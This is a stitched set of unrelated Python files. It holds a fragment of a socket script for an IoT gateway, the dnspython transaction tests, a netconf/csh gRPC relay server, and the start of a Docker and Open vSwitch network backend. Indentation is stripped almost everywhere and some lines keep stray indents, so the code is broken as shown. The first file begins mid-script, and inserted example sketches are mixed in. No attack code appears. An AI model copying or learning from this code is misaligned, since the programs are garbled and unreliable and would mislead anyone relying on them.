msg_auth_ack_datatype = '\x3e\x00'
msg_auth_ack = msg_header+msg_stamp+msg_id_gw+msg_id_dev+msg_devtype+msg_auth_ack_datatype+'\x00\x08'+msg_id_gw
dev_mac_base = 1
sce_id_major_base = 1
sce_id_minor_base = 1
#Authorization
length = skt.send(msg_auth_ack)
print length
msg_bak = skt.recv(1024)
print msg_bak
while(True):
conn, addr = skt.accept()
print 'connection established from : ' + str(addr)
#work_thread = threading.Thread(target = work, args = (conn,))
#work_thread.start()
msg_header = 'AADD'
msg_stamp = '\x00\x00\x00\x00'
msg_id_gw = '2016A011'
msg_id_dev = '00000000'
msg_devtype = '\x00\x00'
msg_auth_ack_datatype = '\x3e\x00'
msg_auth_ack = msg_header+msg_stamp+msg_id_gw+msg_id_dev+msg_devtype+msg_auth_ack_datatype+'\x00\x08'+msg_id_gw
dev_mac_base = 1
sce_id_major_base = 1
sce_id_minor_base = 1
#Authorization
length = conn.send(msg_auth_ack)
print length
msg_bak = conn.recv(1024)
print msg_bak
#scene get all
sce_id_major = '0'*8
sce_id_minor = '0'*8
body_len='\x00\x10'
msg_get_scene = msg_header+msg_stamp+msg_id_gw+msg_id_dev+msg_devtype+'\x0e\x00'+ body_len + sce_id_major +sce_id_minor
#print('msg = ' + msg_set_scene)
    wlength = conn.send(msg_get_scene)
    print wlength
while(True):
msg_bak = conn.recv(200000)
print len(msg_bak)
time.sleep(0.02)
#conn.close()
#skt.close()
#break
time.sleep(500)
|
test_transaction.py
|
# Copyright (C) Dnspython Contributors, see LICENSE for text of ISC license
import time
import pytest
import dns.name
import dns.rdataclass
import dns.rdatatype
import dns.rdataset
import dns.rrset
import dns.transaction
import dns.versioned
import dns.zone
class DB(dns.transaction.TransactionManager):
def __init__(self):
self.rdatasets = {}
def reader(self):
return Transaction(self, False, True)
def writer(self, replacement=False):
return Transaction(self, replacement, False)
def origin_information(self):
return (dns.name.from_text('example'), True, dns.name.empty)
def get_class(self):
return dns.rdataclass.IN
class Transaction(dns.transaction.Transaction):
def __init__(self, db, replacement, read_only):
super().__init__(db, replacement, read_only)
self.rdatasets = {}
if not replacement:
self.rdatasets.update(db.rdatasets)
@property
def db(self):
return self.manager
def _get_rdataset(self, name, rdtype, covers):
return self.rdatasets.get((name, rdtype, covers))
def _put_rdataset(self, name, rdataset):
self.rdatasets[(name, rdataset.rdtype, rdataset.covers)] = rdataset
def _delete_name(self, name):
remove = []
for key in self.rdatasets.keys():
if key[0] == name:
remove.append(key)
if len(remove) > 0:
for key in remove:
del self.rdatasets[key]
def _delete_rdataset(self, name, rdtype, covers):
del self.rdatasets[(name, rdtype, covers)]
def _name_exists(self, name):
for key in self.rdatasets.keys():
if key[0] == name:
return True
return False
def _changed(self):
if self.read_only:
return False
else:
return len(self.rdatasets) > 0
def _end_transaction(self, commit):
if commit:
self.db.rdatasets = self.rdatasets
def _set_origin(self, origin):
pass
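# --- Hedged usage sketch (not part of the original test file) ----------------
# Shows how the minimal DB/Transaction pair above plugs into the generic
# dns.transaction API: writes go through writer() as a context manager and are
# committed into DB.rdatasets on a clean exit (mirroring test_basic below).
def _example_db_roundtrip():
    db = DB()
    rrset = dns.rrset.from_text('www', 300, 'in', 'a', '10.0.0.1')
    with db.writer() as txn:
        txn.add(rrset)
    return db.rdatasets[(rrset.name, rrset.rdtype, 0)]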
@pytest.fixture
def db():
db = DB()
rrset = dns.rrset.from_text('content', 300, 'in', 'txt', 'content')
db.rdatasets[(rrset.name, rrset.rdtype, 0)] = rrset
return db
def test_basic(db):
# successful txn
with db.writer() as txn:
rrset = dns.rrset.from_text('foo', 300, 'in', 'a',
'10.0.0.1', '10.0.0.2')
txn.add(rrset)
assert txn.name_exists(rrset.name)
assert db.rdatasets[(rrset.name, rrset.rdtype, 0)] == \
rrset
# rollback
with pytest.raises(Exception):
with db.writer() as txn:
rrset2 = dns.rrset.from_text('foo', 300, 'in', 'a',
'10.0.0.3', '10.0.0.4')
txn.add(rrset2)
raise Exception()
assert db.rdatasets[(rrset.name, rrset.rdtype, 0)] == \
rrset
with db.writer() as txn:
txn.delete(rrset.name)
assert db.rdatasets.get((rrset.name, rrset.rdtype, 0)) \
is None
def test_get(db):
with db.writer() as txn:
content = dns.name.from_text('content', None)
rdataset = txn.get(content, dns.rdatatype.TXT)
assert rdataset is not None
assert rdataset[0].strings == (b'content',)
assert isinstance(rdataset, dns.rdataset.ImmutableRdataset)
def test_add(db):
with db.writer() as txn:
rrset = dns.rrset.from_text('foo', 300, 'in', 'a',
'10.0.0.1', '10.0.0.2')
txn.add(rrset)
rrset2 = dns.rrset.from_text('foo', 300, 'in', 'a',
'10.0.0.3', '10.0.0.4')
txn.add(rrset2)
expected = dns.rrset.from_text('foo', 300, 'in', 'a',
'10.0.0.1', '10.0.0.2',
'10.0.0.3', '10.0.0.4')
assert db.rdatasets[(rrset.name, rrset.rdtype, 0)] == \
expected
def test_replacement(db):
with db.writer() as txn:
rrset = dns.rrset.from_text('foo', 300, 'in', 'a',
'10.0.0.1', '10.0.0.2')
txn.add(rrset)
rrset2 = dns.rrset.from_text('foo', 300, 'in', 'a',
'10.0.0.3', '10.0.0.4')
txn.replace(rrset2)
assert db.rdatasets[(rrset.name, rrset.rdtype, 0)] == \
rrset2
def test_delete(db):
with db.writer() as txn:
txn.delete(dns.name.from_text('nonexistent', None))
content = dns.name.from_text('content', None)
content2 = dns.name.from_text('content2', None)
txn.delete(content)
assert not txn.name_exists(content)
txn.delete(content2, dns.rdatatype.TXT)
rrset = dns.rrset.from_text('content', 300, 'in', 'txt', 'new-content')
txn.add(rrset)
assert txn.name_exists(content)
txn.delete(content, dns.rdatatype.TXT)
assert not txn.name_exists(content)
rrset = dns.rrset.from_text('content2', 300, 'in', 'txt', 'new-content')
txn.delete(rrset)
content_keys = [k for k in db.rdatasets if k[0] == content]
assert len(content_keys) == 0
def test_delete_exact(db):
with db.writer() as txn:
rrset = dns.rrset.from_text('content', 300, 'in', 'txt', 'bad-content')
with pytest.raises(dns.transaction.DeleteNotExact):
txn.delete_exact(rrset)
rrset = dns.rrset.from_text('content2', 300, 'in', 'txt', 'bad-content')
with pytest.raises(dns.transaction.DeleteNotExact):
txn.delete_exact(rrset)
with pytest.raises(dns.transaction.DeleteNotExact):
txn.delete_exact(rrset.name)
with pytest.raises(dns.transaction.DeleteNotExact):
txn.delete_exact(rrset.name, dns.rdatatype.TXT)
rrset = dns.rrset.from_text('content', 300, 'in', 'txt', 'content')
txn.delete_exact(rrset)
assert db.rdatasets.get((rrset.name, rrset.rdtype, 0)) \
is None
def test_parameter_forms(db):
with db.writer() as txn:
foo = dns.name.from_text('foo', None)
rdataset = dns.rdataset.from_text('in', 'a', 300,
'10.0.0.1', '10.0.0.2')
rdata1 = dns.rdata.from_text('in', 'a', '10.0.0.3')
rdata2 = dns.rdata.from_text('in', 'a', '10.0.0.4')
txn.add(foo, rdataset)
txn.add(foo, 100, rdata1)
txn.add(foo, 30, rdata2)
expected = dns.rrset.from_text('foo', 30, 'in', 'a',
'10.0.0.1', '10.0.0.2',
'10.0.0.3', '10.0.0.4')
assert db.rdatasets[(foo, rdataset.rdtype, 0)] == \
expected
with db.writer() as txn:
txn.delete(foo, rdataset)
txn.delete(foo, rdata1)
txn.delete(foo, rdata2)
assert db.rdatasets.get((foo, rdataset.rdtype, 0)) \
is None
def test_bad_parameters(db):
with db.writer() as txn:
with pytest.raises(TypeError):
txn.add(1)
with pytest.raises(TypeError):
rrset = dns.rrset.from_text('bar', 300, 'in', 'txt', 'bar')
txn.add(rrset, 1)
with pytest.raises(ValueError):
foo = dns.name.from_text('foo', None)
rdata = dns.rdata.from_text('in', 'a', '10.0.0.3')
txn.add(foo, 0x100000000, rdata)
with pytest.raises(TypeError):
txn.add(foo)
with pytest.raises(TypeError):
txn.add()
with pytest.raises(TypeError):
txn.add(foo, 300)
with pytest.raises(TypeError):
txn.add(foo, 300, 'hi')
with pytest.raises(TypeError):
txn.add(foo, 'hi')
with pytest.raises(TypeError):
txn.delete()
with pytest.raises(TypeError):
txn.delete(1)
def test_cannot_store_non_origin_soa(db):
with pytest.raises(ValueError):
with db.writer() as txn:
rrset = dns.rrset.from_text('foo', 300, 'in', 'SOA',
'. . 1 2 3 4 5')
txn.add(rrset)
example_text = """$TTL 3600
$ORIGIN example.
@ soa foo bar 1 2 3 4 5
@ ns ns1
@ ns ns2
ns1 a 10.0.0.1
ns2 a 10.0.0.2
$TTL 300
$ORIGIN foo.example.
bar mx 0 blaz
"""
example_text_output = """@ 3600 IN SOA foo bar 1 2 3 4 5
@ 3600 IN NS ns1
@ 3600 IN NS ns2
@ 3600 IN NS ns3
ns1 3600 IN A 10.0.0.1
ns2 3600 IN A 10.0.0.2
ns3 3600 IN A 10.0.0.3
"""
@pytest.fixture(params=[dns.zone.Zone, dns.versioned.Zone])
def zone(request):
return dns.zone.from_text(example_text, zone_factory=request.param)
def test_zone_basic(zone):
with zone.writer() as txn:
txn.delete(dns.name.from_text('bar.foo', None))
rd = dns.rdata.from_text('in', 'ns', 'ns3')
txn.add(dns.name.empty, 3600, rd)
rd = dns.rdata.from_text('in', 'a', '10.0.0.3')
txn.add(dns.name.from_text('ns3', None), 3600, rd)
output = zone.to_text()
assert output == example_text_output
def test_explicit_rollback_and_commit(zone):
with zone.writer() as txn:
assert not txn.changed()
txn.delete(dns.name.from_text('bar.foo', None))
txn.rollback()
assert zone.get_node('bar.foo') is not None
with zone.writer() as txn:
assert not txn.changed()
txn.delete(dns.name.from_text('bar.foo', None))
txn.commit()
assert zone.get_node('bar.foo') is None
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.delete(dns.name.from_text('bar.foo', None))
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.add('bar.foo', 300, dns.rdata.from_text('in', 'txt', 'hi'))
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.replace('bar.foo', 300, dns.rdata.from_text('in', 'txt', 'hi'))
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.reader() as txn:
txn.rollback()
txn.get('bar.foo', 'in', 'mx')
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.delete_exact('bar.foo')
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.name_exists('bar.foo')
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.update_serial()
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.changed()
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.rollback()
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.commit()
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
for rdataset in txn:
pass
def test_zone_changed(zone):
# Read-only is not changed!
with zone.reader() as txn:
assert not txn.changed()
# delete an existing name
with zone.writer() as txn:
assert not txn.changed()
txn.delete(dns.name.from_text('bar.foo', None))
assert txn.changed()
# delete a nonexistent name
with zone.writer() as txn:
assert not txn.changed()
txn.delete(dns.name.from_text('unknown.bar.foo', None))
assert not txn.changed()
# delete a nonexistent rdataset from an extant node
with zone.writer() as txn:
assert not txn.changed()
txn.delete(dns.name.from_text('bar.foo', None), 'txt')
assert not txn.changed()
# add an rdataset to an extant Node
with zone.writer() as txn:
assert not txn.changed()
txn.add('bar.foo', 300, dns.rdata.from_text('in', 'txt', 'hi'))
assert txn.changed()
# add an rdataset to a nonexistent Node
with zone.writer() as txn:
assert not txn.changed()
txn.add('foo.foo', 300, dns.rdata.from_text('in', 'txt', 'hi'))
assert txn.changed()
def test_zone_base_layer(zone):
with zone.writer() as txn:
# Get a set from the zone layer
rdataset = txn.get(dns.name.empty, dns.rdatatype.NS, dns.rdatatype.NONE)
expected = dns.rdataset.from_text('in', 'ns', 300, 'ns1', 'ns2')
assert rdataset == expected
def test_zone_transaction_layer(zone):
with zone.writer() as txn:
# Make a change
rd = dns.rdata.from_text('in', 'ns', 'ns3')
txn.add(dns.name.empty, 3600, rd)
# Get a set from the transaction layer
expected = dns.rdataset.from_text('in', 'ns', 300, 'ns1', 'ns2', 'ns3')
rdataset = txn.get(dns.name.empty, dns.rdatatype.NS, dns.rdatatype.NONE)
assert rdataset == expected
assert txn.name_exists(dns.name.empty)
ns1 = dns.name.from_text('ns1', None)
assert txn.name_exists(ns1)
ns99 = dns.name.from_text('ns99', None)
assert not txn.name_exists(ns99)
def test_zone_add_and_delete(zone):
with zone.writer() as txn:
a99 = dns.name.from_text('a99', None)
a100 = dns.name.from_text('a100', None)
a101 = dns.name.from_text('a101', None)
rds = dns.rdataset.from_text('in', 'a', 300, '10.0.0.99')
txn.add(a99, rds)
txn.delete(a99, dns.rdatatype.A)
txn.delete(a100, dns.rdatatype.A)
txn.delete(a101)
assert not txn.name_exists(a99)
assert not txn.name_exists(a100)
assert not txn.name_exists(a101)
ns1 = dns.name.from_text('ns1', None)
txn.delete(ns1, dns.rdatatype.A)
assert not txn.name_exists(ns1)
with zone.writer() as txn:
txn.add(a99, rds)
txn.delete(a99)
assert not txn.name_exists(a99)
with zone.writer() as txn:
txn.add(a100, rds)
txn.delete(a99)
assert not txn.name_exists(a99)
assert txn.name_exists(a100)
def test_write_after_rollback(zone):
with pytest.raises(ExpectedException):
with zone.writer() as txn:
a99 = dns.name.from_text('a99', None)
rds = dns.rdataset.from_text('in', 'a', 300, '10.0.0.99')
txn.add(a99, rds)
raise ExpectedException
with zone.writer() as txn:
a99 = dns.name.from_text('a99', None)
rds = dns.rdataset.from_text('in', 'a', 300, '10.99.99.99')
txn.add(a99, rds)
assert zone.get_rdataset('a99', 'a') == rds
def test_zone_get_deleted(zone):
with zone.writer() as txn:
ns1 = dns.name.from_text('ns1', None)
assert txn.get(ns1, dns.rdatatype.A) is not None
txn.delete(ns1)
assert txn.get(ns1, dns.rdatatype.A) is None
ns2 = dns.name.from_text('ns2', None)
txn.delete(ns2, dns.rdatatype.A)
assert txn.get(ns2, dns.rdatatype.A) is None
def test_zone_bad_class(zone):
with zone.writer() as txn:
rds = dns.rdataset.from_text('ch', 'ns', 300, 'ns1', 'ns2')
with pytest.raises(ValueError):
txn.add(dns.name.empty, rds)
with pytest.raises(ValueError):
txn.replace(dns.name.empty, rds)
with pytest.raises(ValueError):
txn.delete(dns.name.empty, rds)
def test_update_serial(zone):
# basic
with zone.writer() as txn:
txn.update_serial()
rdataset = zone.find_rdataset('@', 'soa')
assert rdataset[0].serial == 2
# max
with zone.writer() as txn:
txn.update_serial(0xffffffff, False)
rdataset = zone.find_rdataset('@', 'soa')
assert rdataset[0].serial == 0xffffffff
# wraparound to 1
with zone.writer() as txn:
txn.update_serial()
rdataset = zone.find_rdataset('@', 'soa')
assert rdataset[0].serial == 1
# trying to set to zero sets to 1
with zone.writer() as txn:
txn.update_serial(0, False)
rdataset = zone.find_rdataset('@', 'soa')
assert rdataset[0].serial == 1
with pytest.raises(KeyError):
with zone.writer() as txn:
txn.update_serial(name=dns.name.from_text('unknown', None))
with pytest.raises(ValueError):
with zone.writer() as txn:
txn.update_serial(-1)
with pytest.raises(ValueError):
with zone.writer() as txn:
txn.update_serial(2**31)
class ExpectedException(Exception):
pass
def test_zone_rollback(zone):
a99 = dns.name.from_text('a99.example.')
try:
with zone.writer() as txn:
rds = dns.rdataset.from_text('in', 'a', 300, '10.0.0.99')
txn.add(a99, rds)
assert txn.name_exists(a99)
raise ExpectedException
except ExpectedException:
pass
assert not zone.get_node(a99)
def test_zone_ooz_name(zone):
with zone.writer() as txn:
with pytest.raises(KeyError):
a99 = dns.name.from_text('a99.not-example.')
assert txn.name_exists(a99)
def test_zone_iteration(zone):
expected = {}
for (name, rdataset) in zone.iterate_rdatasets():
expected[(name, rdataset.rdtype, rdataset.covers)] = rdataset
with zone.writer() as txn:
actual = {}
for (name, rdataset) in txn:
actual[(name, rdataset.rdtype, rdataset.covers)] = rdataset
assert actual == expected
@pytest.fixture
def vzone():
return dns.zone.from_text(example_text, zone_factory=dns.versioned.Zone)
def test_vzone_read_only(vzone):
with vzone.reader() as txn:
rdataset = txn.get(dns.name.empty, dns.rdatatype.NS, dns.rdatatype.NONE)
expected = dns.rdataset.from_text('in', 'ns', 300, 'ns1', 'ns2')
assert rdataset == expected
with pytest.raises(dns.transaction.ReadOnly):
txn.replace(dns.name.empty, expected)
def test_vzone_multiple_versions(vzone):
assert len(vzone._versions) == 1
vzone.set_max_versions(None) # unlimited!
with vzone.writer() as txn:
txn.update_serial()
with vzone.writer() as txn:
txn.update_serial()
with vzone.writer() as txn:
txn.update_serial(1000, False)
rdataset = vzone.find_rdataset('@', 'soa')
assert rdataset[0].serial == 1000
assert len(vzone._versions) == 4
with vzone.reader(id=5) as txn:
assert txn.version.id == 5
rdataset = txn.get('@', 'soa')
assert rdataset[0].serial == 1000
with vzone.reader(serial=1000) as txn:
assert txn.version.id == 5
rdataset = txn.get('@', 'soa')
assert rdataset[0].serial == 1000
vzone.set_max_versions(2)
assert len(vzone._versions) == 2
# The ones that survived should be 3 and 1000
rdataset = vzone._versions[0].get_rdataset(dns.name.empty,
dns.rdatatype.SOA,
dns.rdatatype.NONE)
assert rdataset[0].serial == 3
rdataset = vzone._versions[1].get_rdataset(dns.name.empty,
dns.rdatatype.SOA,
dns.rdatatype.NONE)
assert rdataset[0].serial == 1000
with pytest.raises(ValueError):
vzone.set_max_versions(0)
# for debugging if needed
def _dump(zone):
for v in zone._versions:
print('VERSION', v.id)
for (name, n) in v.nodes.items():
for rdataset in n:
print(rdataset.to_text(name))
def test_vzone_open_txn_pins_versions(vzone):
assert len(vzone._versions) == 1
vzone.set_max_versions(None) # unlimited!
with vzone.writer() as txn:
txn.update_serial()
with vzone.writer() as txn:
txn.update_serial()
with vzone.writer() as txn:
txn.update_serial()
with vzone.reader(id=2) as txn:
vzone.set_max_versions(1)
with vzone.reader(id=3) as txn:
rdataset = txn.get('@', 'soa')
assert rdataset[0].serial == 2
assert len(vzone._versions) == 4
assert len(vzone._versions) == 1
rdataset = vzone.find_rdataset('@', 'soa')
assert vzone._versions[0].id == 5
assert rdataset[0].serial == 4
try:
import threading
one_got_lock = threading.Event()
def run_one(zone):
with zone.writer() as txn:
one_got_lock.set()
# wait until two blocks
while len(zone._write_waiters) == 0:
time.sleep(0.01)
rds = dns.rdataset.from_text('in', 'a', 300, '10.0.0.98')
txn.add('a98', rds)
def run_two(zone):
# wait until one has the lock so we know we will block if we
# get the call done before the sleep in one completes
one_got_lock.wait()
with zone.writer() as txn:
rds = dns.rdataset.from_text('in', 'a', 300, '10.0.0.99')
txn.add('a99', rds)
def test_vzone_concurrency(vzone):
t1 = threading.Thread(target=run_one, args=(vzone,))
t1.start()
t2 = threading.Thread(target=run_two, args=(vzone,))
t2.start()
t1.join()
t2.join()
with vzone.reader() as txn:
assert txn.name_exists('a98')
assert txn.name_exists('a99')
except ImportError: # pragma: no cover
pass
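# A condensed sketch (not a test) of the transaction API exercised above, assuming
# the example_text fixture defined earlier in this module. Changes made through
# zone.writer() are committed when the context exits normally and rolled back if
# it raises, as test_zone_rollback demonstrates.
def _example_writer_usage():
    zone = dns.zone.from_text(example_text, zone_factory=dns.versioned.Zone)
    with zone.writer() as txn:
        rds = dns.rdataset.from_text('in', 'a', 300, '10.0.0.50')
        txn.add(dns.name.from_text('a50', None), rds)
        txn.delete(dns.name.from_text('ns1', None), dns.rdatatype.A)
        txn.update_serial()  # bump the SOA serial
    return zone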
|
nc_grpc_server.py
|
"""This is test gRPC server implemented to test the gRPC client"""
from __future__ import print_function
from concurrent import futures
import time
import math
import logging
import sys
import os,socket,json
import argparse
import signal
import grpc
import subprocess
import select
import threading
import jnx_netconf_service_pb2 as nc_grpc_pb2
import jnx_netconf_service_pb2_grpc as nc_grpc_pb2_grpc
# global space
client_list = {}
client_list_detail = {}
connections = {}
server = None
keys_location = os.path.dirname(os.path.realpath(sys.argv[0]))
#Create and configure logger
logFormatter = logging.Formatter("%(asctime)s [%(levelname)-5.5s] %(message)s")
logger = logging.getLogger('nc_grpc_server')
fileHandler = logging.FileHandler(keys_location + '/nc_grpc_server.log')
fileHandler.setFormatter(logFormatter)
logger.addHandler(fileHandler)
consoleHandler = logging.StreamHandler(sys.stdout)
consoleHandler.setFormatter(logFormatter)
logger.addHandler(consoleHandler)
logger.setLevel(logging.DEBUG)
def daemonize():
"""Deamonize class. UNIX double fork mechanism."""
global keys_location
logger.info(keys_location)
try:
pid = os.fork()
if pid > 0:
# exit first parent
sys.exit(0)
except OSError as err:
sys.stderr.write('fork #1 failed: {0}\n'.format(err))
sys.exit(1)
logger.info("First parent process is exited")
# decouple from parent environment
os.chdir('/')
os.setsid()
os.umask(0)
# do second fork
try:
pid = os.fork()
if pid > 0:
# exit from second parent
sys.exit(0)
except OSError as err:
sys.stderr.write('fork #2 failed: {0}\n'.format(err))
sys.exit(1)
logger.info("Second parent process is exited")
# redirect standard file descriptors
sys.stdout.flush()
sys.stderr.flush()
si = open(os.devnull, 'r')
so = open(os.devnull, 'a+')
se = open(os.devnull, 'a+')
os.dup2(si.fileno(), sys.stdin.fileno())
os.dup2(so.fileno(), sys.stdout.fileno())
os.dup2(se.fileno(), sys.stderr.fileno())
logger.info("File descriptors redirection completed")
def close_socket(listen_s):
try:
        listen_s.shutdown(socket.SHUT_RDWR)
except:
pass
try:
listen_s.close()
except:
pass
class UserInputTimeoutError(Exception):
pass
def print_data(request_iterator, c):
try:
logger.info("print_data: Inside print data thread")
prev_message = []
logger.info("print_data: Entered the simultaneous thread print data")
for request_point in request_iterator:
logger.info("print_data: Inside request iterator")
logger.info(str(request_point.message).rstrip())
try:
c.send((str(request_point.message).rstrip()).encode())
except:
pass
prev_message.append(str(request_point.message).rstrip())
if (str(request_point.message).rstrip()).startswith('client is stopping,'):
logger.info("*****print statement breaking******")
return
except:
c.send(("client is stopping,").encode())
logger.info("*********************client connection lost*********************")
return
class Ncgrpc(nc_grpc_pb2_grpc.NcgrpcServicer):
"""Provides methods that implement functionality of NetconfRpc server."""
def __init__(self):
logger.info("***************************Constructor called, Ncgrpc class constructed*************************************")
def __del__(self):
logger.info("Destructor called, Ncgrpc deleted.")
def NcgrpcServerStatusGet(self, request, context):
logger.info("is server running rpc called")
return nc_grpc_pb2.NcgrpcServerStatusGetResponse(
status = 1
)
def NcgrpcCommandGet(self, request_iterator, context):
global connections
meta_dict = {}
for key, value in context.invocation_metadata():
logger.info('Received initial metadata: key={} value={}'.format(key, value))
meta_dict.update({key:value})
conn = connections[context.peer()]
session_type_self = meta_dict["conn_type"]
t1 = threading.Thread(target=print_data, args=(request_iterator,conn,))
t1.start()
while True:
data_r = conn.recv(1024)
logger.info(data_r)
logger.info("Data received from request session ")
if session_type_self == "netconf":
                if not t1.is_alive():
logger.info("NcgrpcCommandGet: Other thread is closed")
break
if data_r.decode().strip() == "":
logger.info("NcgrpcCommandGet: Request session script closed")
yield nc_grpc_pb2.NcgrpcCommandGetResponse(
netconf_command = "<>",
kill_signal = 2)
t1.join()
break
logger.info(data_r.decode())
cmd_new = str(data_r.decode().strip())
yield nc_grpc_pb2.NcgrpcCommandGetResponse(
netconf_command = cmd_new,
kill_signal = 0)
# if cmd_new == "<>":
# t1.join()
# break
elif session_type_self == "csh":
                if not t1.is_alive():
logger.info("NcgrpcCommandGet: Other thread is closed")
break
if data_r.decode().strip() == "":
logger.info("NcgrpcCommandGet: Request session script closed")
yield nc_grpc_pb2.NcgrpcCommandGetResponse(
csh_command = "exit",
kill_signal = 2)
t1.join()
break
logger.info(data_r.decode())
cmd_new = str(data_r.decode().strip())
yield nc_grpc_pb2.NcgrpcCommandGetResponse(
csh_command = cmd_new,
kill_signal = 0)
# The below code is commented unlike in netconf case, as one
# should not close the session based on exit statement during csh mode
# if cmd_new == "exit":
# t1.join()
# break
connections.pop(context.peer())
logger.info("****************** Good Bye*****RPC Ended ********************")
def NcgrpcInitialize(self, request, context):
global client_list
global connections
global client_list_detail
global keys_location
message_auth = request.device_id
grpc_app_id = request.instance_id
secret_key = request.secret_key
logger.info(type(message_auth))
logger.info(message_auth)
client_name = message_auth
for key, value in context.invocation_metadata():
logger.info("NcgrpcInitialize: Received initial metadata(Initial handshake): key={} value={}".format(key, value))
if client_name not in client_list_detail.keys() or (client_name in client_list_detail.keys() and grpc_app_id != client_list_detail[client_name][3]):
logger.info("NcgrpcInitialize: Client is restarted or a new client is trying to connect")
listen_s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listen_s.bind(('localhost', 0))
listen_s.listen()
port = listen_s.getsockname()[1]
port_str = str(port)
data = {client_name: [port_str, listen_s, 1, grpc_app_id]}
if client_name in client_list_detail.keys():
close_socket(client_list_detail[client_name][1])
client_list_detail.update(data)
data = {client_name: port_str}
client_list.update(data)
with open(keys_location + '/server_data.json', 'w+') as outfile:
json.dump(client_list, outfile)
else:
listen_s = client_list_detail[client_name][1]
port = int(client_list_detail[client_name][0])
port_str = str(port)
client_list_detail[client_name][2] = client_list_detail[client_name][2] +1
logger.info("NcgrpcInitialize: else statement executed properly")
logger.info("Listenning")
while True:
c, addr = listen_s.accept()
logger.info("Connection received")
first_message = c.recv(1024)
logger.info("Initial hand shake completed and the client is trusted")
rep_mes = str(first_message.decode().strip())
logger.info(rep_mes)
index = rep_mes.find(':')
secret_key_from_script = rep_mes[index+1:]
rep_mes = rep_mes[0:index]
if secret_key == secret_key_from_script:
c.send(("correct secret key").encode())
break
else:
c.send(("wrong secret key").encode())
context.set_trailing_metadata((
('port', port_str),
('conn_type', rep_mes),
))
logger.info(connections)
connections.update({context.peer():c})
logger.info(connections)
logger.info("Going to return value from initial handshake")
try:
if rep_mes == "netconf":
return nc_grpc_pb2.NcgrpcInitializeResponse(
session_type = 0
)
elif rep_mes == "csh":
return nc_grpc_pb2.NcgrpcInitializeResponse(
session_type = 1
)
except:
try:
                listen_s.shutdown(socket.SHUT_RDWR)
except:
pass
try:
listen_s.close()
except:
pass
def serve():
logger.info("Serve function is called")
global port
global server
global keys_location
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
nc_grpc_pb2_grpc.add_NcgrpcServicer_to_server(
Ncgrpc(), server)
logger.info("Server object is created")
with open(keys_location + '/server.key', 'rb') as f:
private_key = f.read()
with open(keys_location + '/server.crt', 'rb') as f:
certificate_chain = f.read()
logger.info("Read the certificates")
server_credentials = grpc.ssl_server_credentials(((private_key, certificate_chain,),))
server.add_secure_port('[::]:' + port, server_credentials)
server.start()
logger.info("Server started")
server.wait_for_termination()
def signal_handler(sig, frame):
global server
global keys_location
logger.info("Entered into signal_handler")
if server != None:
server.stop(1)
logger.info("Stopping the grpc server gracefully")
pid = os.getpid()
try:
os.remove(keys_location + "/server_data.json")
except:
pass
os.kill(pid, signal.SIGKILL)
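# Hypothetical client-side sketch (not part of this server): how a client might
# probe the server above over TLS. The stub name NcgrpcStub and the request message
# NcgrpcServerStatusGetRequest are assumed from the usual grpc_tools naming for a
# service called Ncgrpc; adjust them to the actual jnx_netconf_service definitions.
def example_status_check(target, ca_cert_path):
    with open(ca_cert_path, 'rb') as f:
        creds = grpc.ssl_channel_credentials(root_certificates=f.read())
    channel = grpc.secure_channel(target, creds)
    stub = nc_grpc_pb2_grpc.NcgrpcStub(channel)  # assumed generated stub name
    response = stub.NcgrpcServerStatusGet(
        nc_grpc_pb2.NcgrpcServerStatusGetRequest())  # assumed request message name
    return response.status == 1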
if __name__ == '__main__':
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGQUIT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
parser = argparse.ArgumentParser()
parser.add_argument('-p', '--port', help='client port',
required=True)
args = parser.parse_args()
port = args.port
daemonize()
serve()
|
DNbackend.py
|
__author__ = 'alejandroaguado'
import redis, logging, sys, json, time
import netifaces as ni
from subprocess import check_output
from docker import Client
import traceback
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler(sys.stdout)
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch.setFormatter(formatter)
logger.addHandler(ch)
stts={"stats":{}}
docky=Client(base_url='unix://var/run/docker.sock')
def load_state():
r=redis.StrictRedis(host="0.0.0.0",port=6379,db=0)
n=r.get("dockernet")
nets={}
if None!=n:
nets=json.loads(n)
return nets
def save_state(n):
r=redis.StrictRedis(host="0.0.0.0",port=6379,db=0)
logger.info("Saving status")
r.set("dockernet",json.dumps(n))
logger.info("Saved")
def RepresentsInt(s):
try:
int(s)
return True
except ValueError:
return False
def add_node(t,n):
try:
if n['type']=="OVS":
check_output(["sudo","ovs-vsctl","add-br",n['id']])
if "controller" in t.keys():
logger.info("Adding controller "+t['controller']['ip']+" to "+n['id'])
time.sleep(0.5)
check_output(["sudo","ovs-vsctl","set-controller",n['id'],"tcp:"+t['controller']['ip']+":6633"])
fakedpid=check_output(["sudo", "ovs-vsctl", "get", "bridge", n['id'], "datapath-id"]).replace('"',"")
j=0
dpid=""
while j<len(fakedpid)-1:
dpid+=fakedpid[j:j+2]+":"
j+=2
dpid=dpid[:-1]
n['dpid']=dpid
if "stp" in n.keys() and n['stp']:
check_output(["sudo","ovs-vsctl","set","bridge",n['id'],"stp_enable=true"])
elif n['type']=="LC":
hc=docky.create_host_config(privileged=True)
docky.create_container(image=n['image'], stdin_open=True, tty=True,command="/bin/bash", name=n['id'], detach=True, host_config=hc)
docky.start(n['id'])
except:
logger.warn("Error adding node: "+n['id'])
